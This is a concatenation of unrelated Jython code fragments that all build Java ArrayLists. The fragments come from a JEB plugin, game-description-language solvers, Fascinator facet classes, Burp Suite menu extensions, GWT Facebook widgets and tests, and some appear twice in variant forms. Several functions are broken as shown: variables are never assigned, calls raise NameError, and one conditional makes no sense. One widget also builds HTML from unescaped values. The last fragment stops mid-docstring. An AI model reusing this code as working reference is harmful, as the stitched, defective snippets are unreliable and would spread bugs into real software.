def run(self, ctx):
    """Attach an extra static text representation named 'Quotes' to the first unit found.

    Looks at the first project of the engines context only. Prints a message
    and returns early when the engines context, the project list or the unit
    list is missing or empty.
    """
    engines = ctx.getEnginesContext()
    if not engines:
        print('Back-end engines not initialized')
        return

    openProjects = engines.getProjects()
    if not openProjects:
        print('There is no opened project')
        return

    # only the first unit of the first project is used
    candidates = RuntimeProjectUtil.findUnitsByType(openProjects[0], None, False)
    if not candidates:
        print('No unit available')
        return

    target = candidates[0]
    print('Unit: %s' % target)

    # the formatter is the producer of unit representations
    unitFormatter = target.getFormatter()

    # build a two-line text document and wrap it in a representation
    quoteLines = ArrayList()
    for text in (
        'There are two hard problems in computer science: cache invalidation, naming things, and off-by-one errors.',
        ' - Phil Karlton (and others)',
    ):
        quoteLines.add(Line(text))
    quoteDoc = StaticTextDocument(quoteLines)
    quotePres = UnitRepresentationAdapter(100, 'Quotes', False, quoteDoc)

    # True: the presentation should be persisted when the project is saved
    unitFormatter.addPresentation(quotePres, True)
    # tell clients of the unit that it changed
    target.notifyListeners(JebEvent(J.UnitChange))
def __init___1(self, parent, i):
    """ Build a child candidate from ``parent`` with source conjunct ``i`` added.

    Rule-wide collections are shared with the parent by reference; the
    per-candidate lists are copied before being extended.
    """
    super(IterationOrderCandidate, self).__init__()
    # Per-candidate state: copies, so the parent is left untouched
    self.sourceConjunctIndices = ArrayList(parent.sourceConjunctIndices)
    self.varOrdering = ArrayList(parent.varOrdering)
    self.functionalConjunctIndices = ArrayList(parent.functionalConjunctIndices)
    self.varSources = ArrayList(parent.varSources)
    # Rule-wide state: same objects as the parent
    self.varsToAssign = parent.varsToAssign
    self.sourceConjunctCandidates = parent.sourceConjunctCandidates
    self.sourceConjunctSizes = parent.sourceConjunctSizes
    self.functionalSentences = parent.functionalSentences
    self.functionalSentencesInfo = parent.functionalSentencesInfo
    self.varDomainSizes = parent.varDomainSizes
    # Record the new source conjunct
    self.sourceConjunctIndices.add(i)
    chosen = self.sourceConjunctCandidates.get(i)
    # Variables already ordered (earlier conjuncts or repeats within this
    # one) are skipped. The original author flagged repeated variables
    # inside a single statement as something to handle later.
    for candidateVar in GdlUtils.getVariables(chosen):
        if self.varOrdering.contains(candidateVar):
            continue
        self.varOrdering.add(candidateVar)
        self.varSources.add(i)
        self.functionalConjunctIndices.add(-1)
class FacetList:
    """Facet tree for one facet field, built from a search result object.

    Facet values are "/"-separated paths. A value without "/" becomes a
    top-level facet; any other value is attached to the facet registered
    under its parent path, if that parent has already been registered.
    """

    def __init__(self, name, results):
        self.__facetMap = HashMap()
        self.__facetList = ArrayList()

        allFacets = results.getFacets()
        if allFacets is None:
            return
        field = allFacets.get(name)
        if field is None:
            return

        counts = field.values()
        for path in counts.keySet():
            entry = Facet(name, path, counts.get(path))
            self.__facetMap.put(path, entry)
            cut = path.rfind("/")
            if cut == -1:
                self.__facetList.add(entry)
                continue
            # a child whose parent path is not registered yet is not attached
            owner = self.__getFacet(path[:cut])
            if owner is not None:
                owner.addSubFacet(entry)

    def __getFacet(self, name):
        """Look up a registered facet by its full value path."""
        return self.__facetMap.get(name)

    def getJsonList(self):
        """Return the getJson() result of every top-level facet as an ArrayList."""
        collected = ArrayList()
        for topLevel in self.__facetList:
            collected.add(topLevel.getJson())
        return collected
class FacetList:
    """Facet tree for one facet field, built from a JSON search response.

    The list at "facet_counts/facet_fields/<name>" is read as alternating
    value, count entries. Values are "/"-separated paths; entries with a
    count of zero or less are skipped.
    """

    def __init__(self, name, json):
        self.__facetMap = HashMap()
        self.__facetList = ArrayList()

        pairs = json.getList("facet_counts/facet_fields/" + name)
        for pos in range(0, len(pairs), 2):
            path = pairs[pos]
            hits = pairs[pos + 1]
            if not count_positive(hits) if False else not (hits > 0):
                continue
            entry = Facet(name, path, hits)
            self.__facetMap.put(path, entry)
            cut = path.rfind("/")
            if cut == -1:
                self.__facetList.add(entry)
                continue
            # a child whose parent path is not registered yet is not attached
            owner = self.__getFacet(path[:cut])
            if owner is not None:
                owner.addSubFacet(entry)

    def __getFacet(self, name):
        """Look up a registered facet by its full value path."""
        return self.__facetMap.get(name)

    def getJsonList(self):
        """Return the getJson() result of every top-level facet as an ArrayList."""
        collected = ArrayList()
        for topLevel in self.__facetList:
            collected.add(topLevel.getJson())
        return collected
def __getRvtNodes(self, manifest): rvtNodes = ArrayList() #print "manifest=%s" % manifest for key in manifest.keySet(): package = False node = manifest.get(key) try: # add the node rvtNode = HashMap() if node.get("hidden") != "True": relPath = node.get("id") # check if node is a package if relPath: package = (self.__getContentType(relPath) == "application/x-fascinator-package") else: relPath = key.replace("node", "blank") rvtNode.put("visible", True) rvtNode.put("title", node.get("title")) if package: subManifest = self.__readManifest(relPath) if subManifest: subManifest = subManifest.getJsonMap("manifest") rvtNode.put("children", self.__getRvtNodes(subManifest)) relPath = key.replace("node", "package") else: rvtNode.put("children", self.__getRvtNodes(node.getJsonMap("children"))) rvtNode.put("relPath", relPath) rvtNodes.add(rvtNode) except Exception, e: log.error("Failed to process node '%s': '%s'" % (node.toString(), str(e)))
def createMenuItems(self, invocation):
    """
    Build the context-menu entry that beautifies or unbeautifies the request
    shown in an editable message window.

    Returns None (no menu) unless the invocation comes from Repeater, Proxy
    or Intruder and the context is the request message editor.
    """
    toolFlag = invocation.getToolFlag()
    supportedTools = [
        IBurpExtenderCallbacks.TOOL_REPEATER,
        IBurpExtenderCallbacks.TOOL_PROXY,
        IBurpExtenderCallbacks.TOOL_INTRUDER,
    ]
    if toolFlag not in supportedTools:
        return
    if invocation.getInvocationContext() != IContextMenuInvocation.CONTEXT_MESSAGE_EDITOR_REQUEST:
        return

    items = ArrayList()
    selected = invocation.getSelectedMessages()[0]
    rawRequest = selected.getRequest()
    parsed = self._helpers.analyzeRequest(rawRequest)
    reference = self._getMessageReferenceFromBeautifyHeader(parsed, rawRequest)

    if reference == -1:
        # -1 from the header lookup: offer to beautify, and advance the
        # reference counter while the menu is being built
        self._messageReference += 1

        def _beautifyClick(event):
            # the counter is read when the item is clicked
            self._simplifyParameters(self._messageReference, selected)

        label, handler = 'Beautify Request', _beautifyClick
    else:
        def _unbeautifyClick(event):
            self._restoreParameters(reference, selected)

        label, handler = 'Unbeautify Request', _unbeautifyClick

    items.add(JMenuItem(label, actionPerformed=handler))
    return items
def pyValToJavaObj(val):
    """Convert a Python value to a Java object, recursing into lists, tuples and dicts.

    int, float, long and bool are matched on their exact type. A list becomes
    an ArrayList, a tuple an unmodifiable list. dict subclasses go through
    pyDictToJavaMap and JavaWrapperClass subclasses through toJavaObj().
    Any other value is returned unchanged.
    """
    kind = type(val)
    # exact-type checks, so a bool never takes the int branch
    if kind is int:
        return Integer(val)
    if kind is float:
        return Float(val)
    if kind is long:
        return Long(val)
    if kind is bool:
        return Boolean(val)
    if kind is list or kind is tuple:
        converted = ArrayList()
        for item in val:
            converted.add(pyValToJavaObj(item))
        if kind is tuple:
            # tuples come back as a read-only view
            return Collections.unmodifiableList(converted)
        return converted
    if issubclass(kind, dict):
        return pyDictToJavaMap(val)
    if issubclass(kind, JavaWrapperClass):
        return val.toJavaObj()
    return val
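def getSourceConjuncts(self):
    """ Return the selected source conjuncts, in selection order.

    These are the conjuncts picked by index from the candidates, not the
    full candidate list.
    """
    sourceConjuncts = ArrayList(len(self.sourceConjunctIndices))
    # the index list is an instance attribute; the bare name used before
    # raised NameError on the first call
    for index in self.sourceConjunctIndices:
        sourceConjuncts.add(self.sourceConjunctCandidates.get(index))
    return sourceConjuncts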
def getCondensationSet(cls, rule, model, checker, sentenceNameSource):
    """ generated source for method getCondensationSet

    For each variable of the rule that does not occur in its head, gathers
    the body literals mentioning it and returns the first such set accepted
    by goodCondensationSetByHeuristic; returns None when no set is accepted.

    NOTE(review): minSet, varsSupplied, varsNeeded, suppliers,
    candidateSuppliersList and literalsToAdd are used below without any
    visible assignment, so this excerpt raises NameError as shown. The
    nesting is reconstructed from a listing that lost its indentation.
    Confirm both against the original source.
    """
    varsInRule = GdlUtils.getVariables(rule)
    varsInHead = GdlUtils.getVariables(rule.getHead())
    # variables that appear in the rule but not in its head
    varsNotInHead = ArrayList(varsInRule)
    varsNotInHead.removeAll(varsInHead)
    for var in varsNotInHead:
        ConcurrencyUtils.checkForInterruption()
        # every body literal that mentions this variable
        for literal in rule.getBody():
            if GdlUtils.getVariables(literal).contains(var):
                minSet.add(literal)
        # relations supply variables; distinct and not literals need them
        for literal in minSet:
            if isinstance(literal, (GdlRelation, )):
                varsSupplied.addAll(GdlUtils.getVariables(literal))
            elif isinstance(literal, (GdlDistinct, )) or isinstance(literal, (GdlNot, )):
                varsNeeded.addAll(GdlUtils.getVariables(literal))
        varsNeeded.removeAll(varsSupplied)
        # NOTE(review): this skips the variable whenever something is still
        # needed, which leaves the loop below with an empty varsNeeded;
        # confirm the condition against the original
        if not varsNeeded.isEmpty():
            continue
        for varNeeded in varsNeeded:
            for literal in rule.getBody():
                if isinstance(literal, (GdlRelation, )):
                    if GdlUtils.getVariables(literal).contains(varNeeded):
                        suppliers.add(literal)
            candidateSuppliersList.add(suppliers)
        # take one literal from each supplier set not already represented
        for suppliers in candidateSuppliersList:
            if Collections.disjoint(suppliers, literalsToAdd):
                literalsToAdd.add(suppliers.iterator().next())
        minSet.addAll(literalsToAdd)
        if goodCondensationSetByHeuristic(minSet, rule, model, checker, sentenceNameSource):
            return minSet
    return None
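def createMenuItems(self, context_menu):
    """Return the context-menu entries contributed by this extension.

    Stores ``context_menu`` on ``self.context`` and returns an ArrayList
    holding one JMenuItem wired to ``self.bing_menu``.
    """
    self.context = context_menu
    menu_list = ArrayList()
    menu_list.add(JMenuItem("Wyslij do Bing", actionPerformed=self.bing_menu))
    # the misspelled name returned before raised NameError, so no menu was
    # ever produced
    return menu_list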
def createMenuItems(self, context_menu):
    """Return the context-menu entries contributed by this extension.

    Stores ``context_menu`` on ``self.context`` and returns an ArrayList with
    two JMenuItems, wired to ``self.email_menu`` and ``self.users_menu``.
    """
    self.context = context_menu
    entries = ArrayList()
    emailItem = JMenuItem("Get Emails", actionPerformed=self.email_menu)
    entries.add(emailItem)
    usersItem = JMenuItem("Generate Usernames", actionPerformed=self.users_menu)
    entries.add(usersItem)
    return entries
def __init__(self, ):
    """Build the widget, then ask the API client whether two lists of users are friends.

    A loader is shown first. When the call succeeds, the loader is replaced
    by one line per returned friend-info entry.
    """
    self.__init__._super()
    outer = VerticalPanel()
    outer.add(self.getLoader())
    result = VerticalPanel()
    result.getElement().setId(u"friendsAreFriendsResult")
    # first list: the logged-in user plus two hard-coded ids
    uids1 = ArrayList((Long),)
    uids1.add(self.apiClient.getLoggedInUser())
    uids1.add(Long(751836969))
    uids1.add(Long(708775201))
    # second list: three hard-coded ids; the first and third are the same
    uids2 = ArrayList((Long),)
    uids2.add(Long(709281400))
    uids2.add(Long(560635378))
    uids2.add(Long(709281400))
    class _anonymous(AsyncCallback):
        @java.typed(Throwable)
        def onFailure(self, caught):
            # NOTE(review): self is the callback instance here, not the
            # enclosing widget; confirm handleFailure exists on it
            self.handleFailure(caught)
        @java.typed(List)
        def onSuccess(self, friendInfoList):
            outer.clear()
            result.add(HTML(u"Size " + java.str(friendInfoList.size())))
            for fi in friendInfoList:
                # NOTE(review): the values are concatenated into HTML(...)
                # without escaping; confirm that FbName and getAreFriends()
                # cannot carry markup
                result.add(HTML(java.str(java.str(FbName(fi.getUid1())) + u" friend with " + FbName(fi.getUid2())) + u" ? " + fi.getAreFriends()))
            outer.add(result)
            Xfbml.parse(result.getElement())
    self.apiClient.friendsAreFriends(uids1, uids2, _anonymous())
    self.initWidget(outer)
def makeNextAssignmentValid(self):
    """ generated source for method makeNextAssignmentValid

    Adjusts self.nextAssignment until it has no None entry, then looks at
    the plan's distinct constraints. Returns immediately when
    self.nextAssignment is None.

    NOTE(review): term1, term2 and varToChange are used without any visible
    assignment, and incrementIndex / changeOneInNext are called as bare
    names, so this excerpt raises NameError as shown. Confirm against the
    original source.
    """
    if self.nextAssignment == None:
        return
    # Something new that can pop up with functional constants...
    i = 0
    while i < len(self.nextAssignment):
        if self.nextAssignment.get(i) == None:
            # Some function doesn't agree with the answer here
            # So what do we increment?
            incrementIndex(self.plan.getIndicesToChangeWhenNull().get(i))
            if self.nextAssignment == None:
                return
            # -1 plus the increment below restarts the scan at index 0
            i = -1
        i += 1
    # Find all the unsatisfied distincts
    # Find the pair with the earliest var. that needs to be changed
    varsToChange = ArrayList()
    d = 0
    while d < self.plan.getDistincts().size():
        # The assignments must use the assignments implied by nextAssignment
        if term1 == term2:
            # need to change one of these
            varsToChange.add(self.plan.getVarsToChangePerDistinct().get(d))
        d += 1
    if not varsToChange.isEmpty():
        # We want just the one, as it is a full restriction on its
        # own behalf
        changeOneInNext(Collections.singleton(varToChange))
def __init___2(self, parent, functionalSentence, functionalSentenceIndex, functionOutput):
    """ Build a child candidate from ``parent`` with a functional sentence added.

    Rule-wide collections are shared with the parent by reference; the
    per-candidate lists are copied before being extended.
    """
    super(IterationOrderCandidate, self).__init__()
    # Per-candidate state: copies, so the parent is left untouched
    self.sourceConjunctIndices = ArrayList(parent.sourceConjunctIndices)
    self.varOrdering = ArrayList(parent.varOrdering)
    self.functionalConjunctIndices = ArrayList(parent.functionalConjunctIndices)
    self.varSources = ArrayList(parent.varSources)
    # Rule-wide state: same objects as the parent
    self.varsToAssign = parent.varsToAssign
    self.sourceConjunctCandidates = parent.sourceConjunctCandidates
    self.sourceConjunctSizes = parent.sourceConjunctSizes
    self.functionalSentences = parent.functionalSentences
    self.functionalSentencesInfo = parent.functionalSentencesInfo
    self.varDomainSizes = parent.varDomainSizes
    # Remaining arguments of the function come first: not yet ordered, not
    # the output, and among the variables to assign
    for argVar in GdlUtils.getVariables(functionalSentence):
        if self.varOrdering.contains(argVar):
            continue
        if argVar == functionOutput:
            continue
        if not self.varsToAssign.contains(argVar):
            continue
        self.varOrdering.add(argVar)
        self.functionalConjunctIndices.add(-1)
        self.varSources.add(-1)
    # The output variable goes last and is tied to the functional sentence
    self.varOrdering.add(functionOutput)
    self.functionalConjunctIndices.add(functionalSentenceIndex)
    self.varSources.add(-1)
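def createMenuItems(self, context_menu):
    """Return the context-menu entries contributed by this extension.

    Stores ``context_menu`` on ``self.context`` and returns an ArrayList
    holding one JMenuItem wired to ``self.wordlist_menu``.
    """
    self.context = context_menu
    menu_list = ArrayList()
    # the keyword must be spelled actionPerformed; the misspelled form used
    # before named no JMenuItem event, so the handler was never attached
    menu_list.add(JMenuItem("Utworz liste slow", actionPerformed=self.wordlist_menu))
    return menu_list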
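def getChildren(self, analyticFunctionOrdering):
    """ Return all child candidates of this candidate.

    The list holds the source-conjunct children first, followed by the
    function-added children for ``analyticFunctionOrdering``.
    """
    allChildren = ArrayList()
    # both helpers are reached through self; as bare names they raised
    # NameError
    allChildren.addAll(self.getSourceConjunctChildren())
    allChildren.addAll(self.getFunctionAddedChildren(analyticFunctionOrdering))
    # print "Number of children being added: " + len(allChildren);
    return allChildren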
def getVariableNames(cls, gdl):
    """ Collect the ``__name__`` of every variable of ``gdl`` into an ArrayList. """
    found = cls.getVariables(gdl)
    names = ArrayList()
    for item in found:
        # NOTE(review): __name__ is read as emitted by the code generator;
        # confirm the variable objects expose it
        names.add(item.__name__)
    return names
def createMenuItems(self, context_menu):
    """Return the context-menu entries contributed by this extension.

    Stores ``context_menu`` on ``self.context`` and returns an ArrayList
    holding one JMenuItem wired to ``self.wordlist_menu``.
    """
    self.context = context_menu
    entries = ArrayList()
    wordlistItem = JMenuItem("Create Wordlist", actionPerformed=self.wordlist_menu)
    entries.add(wordlistItem)
    return entries
class Facet:
    """One facet value with its count and nested sub-facets.

    The value is stored URL-encoded (UTF-8). getName() decodes it and
    returns the segment after the last "/".
    """

    def __init__(self, key, value, count):
        self.__subFacets = ArrayList()
        self.__count = count
        self.__key = key
        self.__value = URLEncoder.encode(value, "UTF-8")

    def getName(self):
        decoded = URLDecoder.decode(self.__value, "UTF-8")
        lastSlash = decoded.rfind("/")
        return decoded[lastSlash + 1:]

    def getKey(self):
        return self.__key

    def getValue(self):
        return self.__value

    def getCount(self):
        return self.__count

    def addSubFacet(self, facet):
        self.__subFacets.add(facet)

    def getSubFacets(self):
        return self.__subFacets

    def getFacetQuery(self):
        # key:"value", with the value still URL-encoded
        parts = (self.__key, self.__value)
        return '%s:"%s"' % parts

    def getId(self):
        # in this class MD5 only derives an identifier from the decoded query
        decodedQuery = URLDecoder.decode(self.getFacetQuery(), "UTF-8")
        return md5.new(decodedQuery).hexdigest()
def resolve(self, s):
    """Resolve this class definition in scope ``s``.

    Builds a ClassType, records its base types, adds the special class
    attributes, binds the type to the class name and resolves the body in
    the new type's table. Returns Analyzer.self.builtins.Cont.
    """
    from pysonarsq.java.Binder import Binder
    from pysonarsq.java.Binding import Binding
    from pysonarsq.java.Analyzer import Analyzer
    classType = ClassType(self.getName().id, s)
    baseTypes = ArrayList()
    for base in self.bases:
        baseType = self.resolveExpr(base, s);
        if baseType.isClassType():
            classType.addSuper(baseType)
        elif baseType.isUnionType():
            # only the first member of a union is added as a super class
            for b in baseType.asUnionType().getTypes():
                classType.addSuper(b)
                break
        else:
            Analyzer.self.putProblem(base, str(base) + " is not a class")
        # NOTE(review): append() is called on a java.util.ArrayList; confirm
        # the runtime provides it, otherwise add() is needed
        baseTypes.append(baseType)
    # XXX: Not sure if we should add "bases", "name" and "dict" here. They
    # must be added _somewhere_ but I'm just not sure if it should be HERE.
    builtins = Analyzer.self.builtins
    self.addSpecialAttribute(classType.getTable(), "__bases__", TupleType(baseTypes))
    self.addSpecialAttribute(classType.getTable(), "__name__", builtins.BaseStr)
    self.addSpecialAttribute(classType.getTable(), "__dict__", DictType(builtins.BaseStr, Analyzer.self.builtins.unknown))
    self.addSpecialAttribute(classType.getTable(), "__module__", builtins.BaseStr)
    self.addSpecialAttribute(classType.getTable(), "__doc__", builtins.BaseStr)
    # Bind ClassType to name here before resolving the body because the
    # methods need this type as self.
    Binder.bind(s, self.name, classType, Binding.Kind.CLASS)
    self.resolveExpr(self.body, classType.getTable())
    return Analyzer.self.builtins.Cont
def getProps(self, ps, imageCache, f, nature, editor, offset):
    '''java: List<ICompletionProposal> getProps(PySelection ps, ImageCache imageCache, File f, IPythonNature nature,
    PyEdit edit, int offset)

    Returns a one-element list: the proposal that runs self.assignToAttribsOfSelf.
    '''
    # the proposal classes are fetched from the editor rather than imported
    IPyCompletionProposal = editor.getIPyCompletionProposalClass() #@UnresolvedImport
    PyCompletionProposal = editor.getPyCompletionProposalClass() #@UnresolvedImport
    UIConstants = editor.getUIConstantsClass() #@UnresolvedImport

    #=======================================================================================================================
    # Prop
    #=======================================================================================================================
    class Prop(PyCompletionProposal):
        '''Proposal offered by Ctrl+1; applying it runs the wrapped action.
        '''

        def __init__(self, assignToAttribsOfSelf, *args):
            PyCompletionProposal.__init__(self, *args)
            self.assignToAttribsOfSelf = assignToAttribsOfSelf

        def apply(self, document):
            '''java: public void apply(IDocument document)
            '''
            self.assignToAttribsOfSelf.run()

        def getSelection(self, document):
            return None

    from java.util import ArrayList
    proposals = ArrayList()
    proposal = Prop(
        self.assignToAttribsOfSelf,
        '',
        0,
        0,
        0,
        self.getImage(imageCache, UIConstants.ASSIST_DOCSTRING),
        "Assign parameters to attributes",
        None,
        None,
        IPyCompletionProposal.PRIORITY_DEFAULT,
    )
    proposals.add(proposal)
    return proposals
def core(imp):
    """Cluster the points parsed from ``imp`` and paint each point with its cluster number.

    Returns a duplicate of ``imp`` in which every clustered point is written
    as pixel value (cluster index + 1) on slice int(z) + 1.
    """
    parsed = parsePoints(imp)
    # the clusterer takes a Java List of Clusterable
    wrapped = ArrayList()
    for point in parsed:
        wrapped.add(PosWrap(point[0], point[1], point[2]))
    # kept from the original: reads the first point, so an empty point list
    # fails here
    first = wrapped.get(0)
    firstCoords = first.getPoint()
    #print firstCoords
    kmeans = KMeansPlusPlusClusterer(Number_of_Cluster, Iteration)
    clusters = kmeans.cluster(wrapped)
    painted = imp.duplicate()
    for clusterIndex in range(clusters.size()):
        if Verbose:
            IJ.log('Cluster: ' + str(clusterIndex))
        members = clusters.get(clusterIndex).getPoints()
        for member in members:
            xpos = member.getPoint()[0]
            ypos = member.getPoint()[1]
            zpos = member.getPoint()[2]
            if Verbose:
                IJ.log('... ' + str(xpos) + ', ' + str(ypos) + ', ' + str(zpos))
            # slice numbers and cluster labels both start at 1
            processor = painted.getStack().getProcessor(int(zpos)+1)
            processor.putPixel(int(xpos), int(ypos), clusterIndex+1)
    return painted
def __getRvtNodes(self, manifest): rvtNodes = ArrayList() #print "manifest=%s" % manifest for node in manifest: package = False try: # add the node rvtNode = HashMap() if not node.getHidden(): oid = node.getId() # check if node is a package if oid != "blank": package = (self.__getContentType(oid) == "application/x-fascinator-package") else: oid = node.getKey().replace("node", "blank") rvtNode.put("visible", True) rvtNode.put("title", node.getTitle()) if package: subManifest = self.__readManifest(oid) if subManifest is not None: rvtNode.put("children", self.__getRvtNodes(subManifest.getTopNodes())) oid = node.getKey().replace("node", "package") else: rvtNode.put("children", self.__getRvtNodes(node.getChildren())) rvtNode.put("relPath", oid) rvtNodes.add(rvtNode) except Exception, e: self.log.error("Failed to process node '%s': '%s'" % (node.toString(), str(e)))
def _sbi_list_arraylist(list):
    """Copy the items of a Python list into a new ArrayList, in order.

    Subroutine for _sub_build_intentions_icl.
    """
    javaCopy = ArrayList()
    for item in list:
        javaCopy.add(item)
    return javaCopy
def test_ArrayList(self):
    """create ArrayList in JVM (from the JavaSet)

    Copies self.javaList into a new ArrayList and checks size, element
    positions, and that the first two elements equal the first two entries
    of self.testList in value and type.
    """
    arrayList = ArrayList(self.javaList)
    # print "created ArrayList:", arrayList, type(arrayList)
    self.assertEqual(self.javaList.size(), arrayList.size(), "ArrayList has same size")
    elem0 = arrayList.get(0)
    elem1 = arrayList.get(1)
    self.assertEqual(0, arrayList.indexOf(elem0), "same index position")
    self.assertEqual(1, arrayList.indexOf(elem1), "same index position")
    listElem0 = self.testList[0]
    listElem1 = self.testList[1]
    # elements whose Java class is listed in self._primitive_types are cast
    # before the comparisons
    _type = self._primitive_types.get(elem0.getClass())
    if _type is not None:
        elem0 = _type.class_.cast(elem0)
        elem1 = _type.class_.cast(elem1)
    self.assertEqual(elem0, listElem0, "should be equal: %s (%s) <-> %s (%s)" % ( elem0, type(elem0), listElem0, type(listElem0)))
    self.assertEqual(elem1, listElem1, "should be equal: %s (%s) <-> %s (%s)" % ( elem1, type(elem1), listElem1, type(listElem1)))
    self.assertEqual(type(elem0), type(listElem0), "should have same type: %s <-> %s" % ( type(elem0), type(listElem0)))
    # the fixture is expected to hold two different leading elements
    self.assertNotEqual(elem0, elem1, "ArrayList: first element must NOT equal second element")
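def readCSV(filepath):
    """Read every row of the comma-separated file at ``filepath`` into an ArrayList.

    The file reader is closed before returning, including when parsing
    raises, so the file handle is not leaked.
    """
    # assumes FileReader is java.io.FileReader, which provides close()
    source = FileReader(filepath)
    try:
        rows = CSVReader(source, ",").readAll()
    finally:
        source.close()
    data = ArrayList()
    for row in rows:
        data.add(row)
    return data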
class Facet:
    """One facet value with its count and nested sub-facets.

    The display name is the segment of the value after the last "/". The
    facet query key:"value" is stored URL-encoded (UTF-8), and the id is the
    MD5 hex digest of the unencoded query.
    """

    def __init__(self, key, value, count):
        lastSlash = value.rfind("/")
        self.__name = value[lastSlash + 1:]
        rawQuery = '%s:"%s"' % (key, value)
        self.__facetQuery = URLEncoder.encode(rawQuery, "UTF-8")
        # in this class MD5 only derives an identifier from the query
        self.__id = md5.new(rawQuery).hexdigest()
        self.__count = count
        self.__subFacets = ArrayList()

    def getId(self):
        return self.__id

    def getName(self):
        return self.__name

    def getCount(self):
        return self.__count

    def getFacetQuery(self):
        return self.__facetQuery

    def addSubFacet(self, facet):
        self.__subFacets.add(facet)

    def getSubFacets(self):
        return self.__subFacets
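def __init__(self, plan):
    """ Set up the iterator over assignments described by ``plan``.

    When the plan has no variables to assign, only ``headOnly`` is set.
    Otherwise every source-tuple index and value index starts at 0 and the
    first valid assignment is computed.
    """
    super(AssignmentIteratorImpl, self).__init__()
    self.plan = plan
    # TODO: Handle this case with a separate class
    if plan.getVarsToAssign() == None:
        self.headOnly = True
        return
    # Set up source tuple...
    sourceCount = plan.getTuplesBySource().size()
    self.sourceTupleIndices = ArrayList(sourceCount)
    for _ in range(sourceCount):
        self.sourceTupleIndices.add(0)
    # Set up...
    varCount = plan.getVarsToAssign().size()
    self.valueIndices = ArrayList(varCount)
    # NOTE(review): nextAssignment and assignmentMap are not created in this
    # method; presumably they are class-level attributes - confirm
    for _ in range(varCount):
        self.valueIndices.add(0)
        self.nextAssignment.add(None)
    self.assignmentMap.putAll(plan.getHeadAssignment())
    # Update "nextAssignment" according to the values of the value indices.
    # Both helpers are reached through self; as bare names they raised
    # NameError.
    self.updateNextAssignment()
    # Keep updating it until something really works
    self.makeNextAssignmentValid()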
def getMethodArgNames(self, moduleName, className, methodName):
    """Return the result of getMethodArgs for the given method as a java.util.ArrayList."""
    from java.util import ArrayList
    pyArgs = self.getMethodArgs(moduleName, className, methodName)
    javaArgs = ArrayList()
    for argName in pyArgs:
        javaArgs.add(argName)
    return javaArgs
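class Styler(DefaultNodeVisitor):
    """ Node visitor that collects StyleRun entries for one source file.

    addStyles() is the entry point; the visit() callbacks record runs for
    numbers, triple-quoted strings, function names, parameters and builtins.
    """
    # NOTE(review): re.match anchors only at the start, so identifiers that
    # merely begin with one of these names also match - confirm intended
    BUILTIN = re.compile("None|True|False|NotImplemented|Ellipsis|__debug__")

    #
    #      * Matches the start of a triple-quote string.
    #
    TRISTRING_PREFIX = re.compile("^[ruRU]{0,2}['\"]{3}")

    #linker = Linker()
    #
    #      * Offsets of doc strings found by node visitor.
    #      * Class-level, so the set is shared by all Styler instances.
    #
    docOffsets = HashSet()

    def __init__(self, idx, linker):
        """ Keep the analyzer and linker; path and source are set by addStyles. """
        super(Styler, self).__init__()
        self.analyzer = idx
        self.styles = ArrayList()
        self.linker = linker
        self.path = None
        self.source = None

    #
    #      * Entry point for decorating a source file.
    #      *
    #      * @param path absolute file path
    #      * @param src  file contents
    #
    def addStyles(self, path, src):
        """ Visit the AST of ``path`` and return the collected styles, sorted. """
        self.path = path
        self.source = src
        m = self.analyzer.getAstForFile(path)
        if m is not None:
            m.visit(self)
            self.styles = sorted(self.styles, lambda a, b: a.compareTo(b))
        return self.styles

    #@overloaded
    def visit(self, n):
        """ Record a style run for ``n`` when it is a Num, Str or Name node; always returns True. """
        if isinstance(n, Num):
            self.addStyle(n, StyleRun.Type.NUMBER)
            return True
        if isinstance(n, Str):
            s = self.sourceString(n.start, n.end)
            #if self.TRISTRING_PREFIX.match(s).lookingAt():
            if self.TRISTRING_PREFIX.match(s) is not None:
                self.addStyle(n.start, n.end - n.start, StyleRun.Type.DOC_STRING)
                self.docOffsets.add(n.start)  # don't re-highlight as a string
                # highlightDocString(n);
            return True
        if isinstance(n, Name):
            parent = n.getParent()
            if isinstance(parent, (FunctionDef, )):
                fn = parent
                if n == fn.name:
                    self.addStyle(n, StyleRun.Type.FUNCTION)
                elif n == fn.kwarg or n == fn.vararg:
                    self.addStyle(n, StyleRun.Type.PARAMETER)
                return True
            if self.BUILTIN.match(n.id) is not None:
                self.addStyle(n, StyleRun.Type.BUILTIN)
                return True
            return True

    def addStyle(self, *args):
        """ Dispatch on argument count: 4 -> addStyle1, 2 -> addStyle2, 3 -> addStyle3. """
        if len(args) == 4:
            self.addStyle1(*args)
        elif len(args) == 2:
            self.addStyle2(*args)
        elif len(args) == 3:
            self.addStyle3(*args)

    #@overloaded
    def addStyle1(self, e, start, len, type_):
        """ Add a run for ``e`` only when it belongs to a file. """
        if e.getFile() is not None:  # if it's an NUrl, for instance
            self.addStyle(start, len, type_)

    #@addStyle.register(object, Node, StyleRun.Type)
    def addStyle2(self, e, type_):
        """ Add a run covering the whole node when both offsets are known. """
        if e.start is not None and e.end is not None:
            self.addStyle(e, e.start, e.end - e.start, type_)

    #@addStyle.register(object, int, int, StyleRun.Type)
    def addStyle3(self, begin, len, type_):
        """ Append the StyleRun itself. """
        self.styles.append(StyleRun(type_, begin, len))

    def sourceString(self, *args):
        """ Dispatch: one argument -> sourceString0(node), otherwise sourceString1(begin, end). """
        if len(args) == 1:
            return self.sourceString0(*args)
        else:
            return self.sourceString1(*args)

    #@overloaded
    def sourceString0(self, e):
        """ Return the source text covered by node ``e``. """
        return self.sourceString(e.start, e.end)

    #@sourceString.register(object, int, int)
    def sourceString1(self, begin, end):
        """ Return self.source between ``begin`` and ``end``, clamped to the source bounds.

        Returns "" when slicing fails.
        """
        a = max(begin, 0)
        b = min(end, len(self.source))
        b = max(b, 0)
        try:
            # slice, not a tuple index: the earlier [a, b] form raised
            # TypeError on every call, which the handler below turned into
            # "", so no string was ever recognised as a doc string
            return self.source[a:b]
        except Exception as sx:
            # Silent here, only happens for weird encodings in file
            return ""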
def getLoadedFiles(self):
    """Return the entries of self.loadedFiles whose name ends with ".py"."""
    pythonFiles = ArrayList()
    for candidate in self.loadedFiles:
        if not candidate.endswith(".py"):
            continue
        pythonFiles.append(candidate)
    return pythonFiles
def getDiagnosticsForFile(self, file_):
    """Return the semantic errors recorded for ``file_``, or a new empty ArrayList when none are recorded."""
    recorded = self.semanticErrors.get(file_)
    # only a missing entry falls back; an empty recorded list is returned as is
    return ArrayList() if recorded is None else recorded
def getJavaList(self):
    """Return a new ArrayList holding "one", 2, "three", 4, "five" in that order."""
    javaList = ArrayList()
    for item in ("one", 2, "three", 4, "five"):
        javaList.add(item)
    return javaList
def __init__(self):
    """Place the object at (width/2, height/2) with default velocity and acceleration vectors,
